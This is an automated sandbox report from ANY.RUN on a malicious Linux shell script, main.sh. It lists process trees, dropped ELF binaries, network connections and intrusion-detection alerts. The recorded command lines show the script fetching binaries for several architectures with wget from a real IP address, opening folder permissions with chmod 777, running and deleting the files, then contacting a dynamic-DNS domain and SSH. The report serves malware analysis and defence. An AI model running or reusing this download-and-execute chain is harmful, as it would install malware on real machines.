File name: main.sh
Full analysis: https://app.any.run/tasks/cb2a0fb4-c60d-4740-99c5-c5a888d45bb7
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:40:27
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 041FD7CD861D6AD38485C1E783EC10B3
SHA1: 2BE77942D3CB68D4B2116D5E29AD4AE446019F98
SHA256: EE58E06CE6F1DF21CE9A75D8601F0027F32585340978ED1E4DCE1C4746ECC468
SSDEEP: 12:EkJJMcdkqyEkJJMcdT1qy/akJJMcCqzkJJMca6qoahkJJMcYqx:7JJbREJJbimhJJbVgJJb8TuJJbbx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • main_x86 (deleted) (PID: 41406)
      • main_x86 (deleted) (PID: 41408)
      • main_x86 (PID: 41405)
      • main_x86_64 (deleted) (PID: 41413)
      • main_x86_64 (PID: 41412)
      • main_x86_64 (deleted) (PID: 41414)
  • SUSPICIOUS
    • Modifies file or directory owner
      • sudo (PID: 41397)
    • Starts itself from another location
      • main_x86_64 (PID: 41412)
      • main_x86 (PID: 41405)
    • Executes the "rm" command to delete files or directories
      • bash (PID: 41401)
    • Executes commands using command-line interpreter
      • sudo (PID: 41400)
      • bash (PID: 41401)
    • Uses wget to download content
      • bash (PID: 41401)
    • Potential Corporate Privacy Violation
      • wget (PID: 41403)
      • wget (PID: 41417)
      • wget (PID: 41424)
      • wget (PID: 41410)
      • wget (PID: 41431)
    • Connects to SSH
      • main_x86 (deleted) (PID: 41406)
      • main_x86_64 (deleted) (PID: 41413)
  • INFO
    • Checks timezone
      • wget (PID: 41403)
      • wget (PID: 41417)
      • wget (PID: 41410)
      • wget (PID: 41424)
      • wget (PID: 41431)
No Malware configuration.
Total processes: 165
Monitored processes: 35
Malicious processes: 1
Suspicious processes: 6

Behavior graph

Process nodes, in the order shown in the graph (35 monitored processes): dash, sudo, chown, chmod, sudo, bash, locale-check, wget, chmod, main_x86, rm, main_x86 (deleted), main_x86 (deleted), bash, wget, chmod, main_x86_64, rm, main_x86_64 (deleted), bash, main_x86_64 (deleted), wget, chmod, bash, rm, bash, wget, chmod, bash, rm, bash, wget, chmod, bash, rm

Process information

PID: 41396
CMD: /bin/sh -c "sudo chown user /home/user/Desktop/main\.sh && chmod +x /home/user/Desktop/main\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/main\.sh "
Path: /usr/bin/dash
Parent process: UbvyYXL4x2mYa65Q
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41397
CMD: sudo chown user /home/user/Desktop/main.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41398
CMD: chown user /home/user/Desktop/main.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41399
CMD: chmod +x /home/user/Desktop/main.sh
Path: /usr/bin/chmod
Parent process: dash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41400
CMD: sudo -iu user /home/user/Desktop/main.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41401
CMD: -bash --login -c \/home\/user\/Desktop\/main\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41402
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41403
CMD: wget http://41.216.188.159/main_x86
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
  /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
  /usr/lib/x86_64-linux-gnu/libssl.so.3
  /usr/lib/x86_64-linux-gnu/libcrypto.so.3
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
  /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

PID: 41404
CMD: chmod 777 Desktop Documents Downloads main_x86 Music Pictures Public snap Templates test_files Videos
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41405
CMD: ./main_x86
Path: /home/user/main_x86
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Executable files: 0
Suspicious files: 5
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
41403 | wget | /home/user/main_x86 | binary
41410 | wget | /home/user/main_x86_64 | binary
41417 | wget | /home/user/main_arm (deleted) | binary
41424 | wget | /home/user/main_arm7 | binary
41431 | wget | /home/user/main_m68k (deleted) | binary

The MD5 and SHA256 fields for all five dropped files are empty in the report.
HTTP(S) requests: 17
TCP/UDP connections: 22
DNS requests: 55
Threats: 60

HTTP requests

No PID or process is recorded for any of the listed requests; the CN column is "unknown" for every row. Empty fields are shown as "-".

Method | HTTP Code | IP | URL | Type | Size | Reputation
GET | - | 207.211.211.27:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | - | - | -
POST | - | 185.125.188.54:443 | https://api.snapcraft.io/v2/snaps/refresh | - | - | whitelisted
POST | 200 | 185.125.188.57:443 | https://api.snapcraft.io/v2/snaps/refresh | binary | 45.5 Kb | whitelisted
POST | 200 | 185.125.188.57:443 | https://api.snapcraft.io/api/v1/snaps/auth/nonces | binary | 54 b | whitelisted
POST | 200 | 185.125.188.58:443 | https://api.snapcraft.io/api/v1/snaps/auth/sessions | - | - | whitelisted
POST | 200 | 185.125.188.59:443 | https://api.snapcraft.io/v2/snaps/refresh | binary | 45.4 Kb | whitelisted
GET | 200 | 185.125.188.58:443 | https://api.snapcraft.io/v2/snaps/info/curl?architecture=amd64&fields=architectures%2Cbase%2Cconfinement%2Clinks%2Ccontact%2Ccreated-at%2Cdescription%2Cdownload%2Cepoch%2Clicense%2Cname%2Cprices%2Cprivate%2Cpublisher%2Crevision%2Csnap-id%2Csummary%2Ctitle%2Ctype%2Cversion%2Cwebsite%2Cstore-url%2Cmedia%2Ccommon-ids%2Ccategories | - | - | -
GET | - | 185.125.190.97:80 | http://connectivity-check.ubuntu.com/ | - | - | whitelisted
GET | 204 | 185.125.190.97:80 | http://connectivity-check.ubuntu.com/ | - | - | whitelisted
GET | 204 | 185.125.190.98:80 | http://connectivity-check.ubuntu.com/ | - | - | whitelisted

Connections

Empty fields are shown as "-".

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 185.125.190.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 185.125.190.97:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
484 | avahi-daemon | 224.0.0.251:5353 | - | - | - | unknown
- | - | 185.125.190.48:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 207.211.211.27:443 | odrs.gnome.org | - | US | whitelisted
- | - | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
- | - | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
41403 | wget | 41.216.188.159:80 | - | Private-Hosting di Cipriano oscar | DE | unknown
41410 | wget | 41.216.188.159:80 | - | Private-Hosting di Cipriano oscar | DE | unknown
41417 | wget | 41.216.188.159:80 | - | Private-Hosting di Cipriano oscar | DE | unknown

DNS requests

Domain | IP | Reputation
connectivity-check.ubuntu.com | resolved addresses omitted | whitelisted
odrs.gnome.org | resolved addresses omitted | whitelisted
api.snapcraft.io | resolved addresses omitted | whitelisted
google.com | 142.250.186.142, 2a00:1450:4001:82a::200e | whitelisted
4.100.168.192.in-addr.arpa | (no address listed) | unknown
vagner.sytes.net | (no address listed) | unknown

Threats

PID | Process | Class | Message
41403 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41406 | main_x86 (deleted) | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41410 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41413 | main_x86_64 (deleted) | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41417 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41424 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41431 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41406 | main_x86 (deleted) | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41413 | main_x86_64 (deleted) | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41406 | main_x86 (deleted) | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain